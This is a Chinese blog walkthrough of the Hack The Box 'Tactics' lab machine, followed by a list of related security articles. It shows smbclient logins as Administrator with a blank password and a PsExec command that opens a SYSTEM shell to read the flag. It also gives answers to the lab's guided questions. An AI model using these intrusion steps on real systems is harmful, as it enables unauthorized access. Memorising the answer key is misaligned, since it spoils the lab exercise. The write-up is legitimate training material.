HTB_Tactics靶机之smb使用psexec获取shell

已于 2023-02-08 13:33:39 修改
阅读量706 收藏
点赞数
分类专栏: # startpoint 文章标签: linux 安全 运维 网络安全
于 2022-05-30 13:12:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/125044683
版权

很简单的smb重复实践

文章目录

信息收集

日常扫描,和 HTB_Dancing 靶机所涉及的服务一致,上次是讲的 smb 服务

135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?

连接 smb 端口,测试 root 和空密码都报错,百度后说这是因为执行 smbclient 命令的用户 ID 没有成为 samba 服务的用户,我们添加用户名,空密码

┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares                                                                                                                               1 ⨯
Enter WORKGROUP\root's password: 
session setup failed: NT_STATUS_IO_TIMEOUT
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.69.58/WorkShares -U Administrator
Enter WORKGROUP\Administrator's password: 
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC

分别连接测试

┌──(root💀kali)-[~]
└─# smbclient //10.129.69.58/ADMIN$ -U Administrator                                                                                                                 130 ⨯
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> ls

实践

话说,这么多文件可不可以搜索呢? 没找到,只能翻,但是还是可以猜测比较常用的敏感文件路径,最后在 C:/Users/Administrator/Desktop 下找到 flag.txt 文件

在这里插入图片描述

里面还提到了一个 PsExec 登录获取 shell 的,这是一个 windows 系统自带的工具,到官网去下载 👉psexec下载-s 是获取管理员权限,成功

PS E:\PSTools> .\PsExec.exe \\10.129.69.58 -u Administrator -s cmd

在这里插入图片描述

使用 type 查看目标文件

在这里插入图片描述

答案

-Pn    //使用禁ping命令扫描
Server Message Block
445
-L
$
C$
get
psexec.py
重返太空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SMB服务——CTF靶机
panda.
10-19 325
SMB服务 CTF靶机,有想法的可以私信我(有解析有环境) 首先使用fping工具扫描靶机ip 使用nmap工具扫描端口开放状态 使用smbclient工具扫描 连接进入路径 查看文件 下载文件查看wordpress网站的账户密码 使用get指令下载文件 登录网站 使用msfvenom工具生成木马上传到网站中,利用漏洞连接进入靶机 Shell靶机后台即可
SQL注入\工具使用\DC-3靶机信息获取
Chenamao的博客
07-29 449
目录 SQL注入基本方法 1.联合查询 2.报错注入 3.布尔盲注 4.延时注入 SQLMAP 工具 重要常用参数 POST 注入 COOKie 注入 直接GetShell 实验 DC3 获取网站后台管理员帐密并且登录后台 SQL注入基本方法 1.联合查询 由于数据库中的内容会回显到页面中来,所以可以使用联合查询进行注入。 联合查询就是利用 union select 语句,该语句会同时执行两条select语句。 附: 必要条件 两条select 语句查询结果具有...
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1147
实验靶场联系笔记 文章目录实验靶场联系笔记搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
横向渗透之PSExecSMBExec和WMIExec使用及特征_smbexec wmiexec(1)
2401_83621331的博客
04-16 439
那好,下面就让我们快速读取这个文件中存储的数据。基于 smb 协议通信,用于在两个进程之间传输数据,包括本地进程和远程进程,其客户端既可以接收数据也可以发送数据,服务器端也是可以接收数据,又可以发送数据。建立连接之后,我们执行notepad.exe,可以发现它卡在这了,这因为我们在等待远程机器的输入,然而它永远不会输入。首先我们通过PSEXEC去横向的时候,这里上传了一个文件名字叫SBxFixsS.exe的文件,也就是说将这个文件写入到了远程机器的ADMIN$共享中,我们可以查看一下共享目录。
如何使用Psexec工具运行命令并获取Shell远程Windows系统?
cunjiu9486的博客
10-10 1703
Windows operating system provides different ways to manage remote systems. Telnet, RDP, VNC are some of them. But these options are generally bound to a graphical user interface. If we prefer a comman...
smb靶场训练
MIGENGKING的博客
06-12 776
静态的标记语言 HTML指的是超文本标记语言(Hyper Text Markip Language),它不是一种编程语言而是一种标记语言,通过使用标签来描述网页。 html: < a href=”链接的地址”>链接文本</> HTML指的是超文本标记语言(Hyper Text Markip Language),它不是一种编程语言而是一种标记语言,通过使用标签来描述网页。 ...
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
python库,解压后可用。 资源全名:htb_cli-0.1.1-py3-none-any.whl
SMB协议利用之-PsExec使用过程介绍
村中少年的专栏
05-09 761
本文介绍psexec的基本功能使用和原理,为后续分析psexecSMB流量分析奠定基础
利用共享,smb渗透
baiduxuexin的专栏
11-11 497
exploit/windows/smb/psexec 默认共享:ADMIN$ windows2003: administrator 123456 (192.168.1.3) msfconsole useexploit/windows/smb/psexec set rhost 192.168.1.3 set smbuser administrator set smbpass 12...
CTF之LazySysadmin 靶机渗透(SMB信息泄露)
afei001
04-04 396
SMB介绍     SMB (Server Message Block)通信协议是微软(Microsoft) 和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。     SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application lay...
【内网安全-横向移动】基于SMB协议-PsExec
02-10 8573
【横向移动-基于SMB协议】PsExec
SMB攻击利用之-通过psexec添加用户流量数据包分析
最新发布
村中少年的专栏
05-10 41
本文通过分析已知的PsExec为远端主机添加用户的流量,分析了SMB,DCE/RPC,SVCCTL等多种协议的交互细节,为日常安全运营,护网HVV,重保过程中遇到的关于psexec的流量分析提供参考
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1165
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递(pth,ptk等进行移动)2.利用其他服务协议(SMB,WMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第三方工具(hashcat)进行破解获取
HTB_Dancing 靶机smb 协议简介
网络安全学习
04-19 3118
文章目录SMB 简介如何使用?ftp 和 smb 的区别 ps:填空答案已在文中标出 SMB 简介 smb 协议,全称 Server Message Block [1] ,是一种在局域网中用于共享文件、打印机和串口的协议 使用 nmap -A 扫描目标主机,查看开放端口,共有 3 个服务, 服务是具体的功能,而协议是规则,注意区分 ┌──(root💀kali)-[~] └─# nmap -A 10.129.107.28 PORT STATE SERVICE VERSION 135/tcp
PsExec使用
weixin_45007073的博客
07-11 7024
PsExec前言攻击过程使用psexec的注意事项Metasploit中的psexec模块 前言 PsExec是SysInternals套件中的一款强大的软件。攻击者通过命令行环境与目标机器进行连接,甚至控制目标机器,而不需要通过远程桌面协议(RDP)进行图形化控制,降低了恶意操作被管理员发现的可能性。 PsExec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为PSEXESVC的二进制文件,然后通过psexec服务运行命令,运行结束后删除任务。 攻击过程 首先我们
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值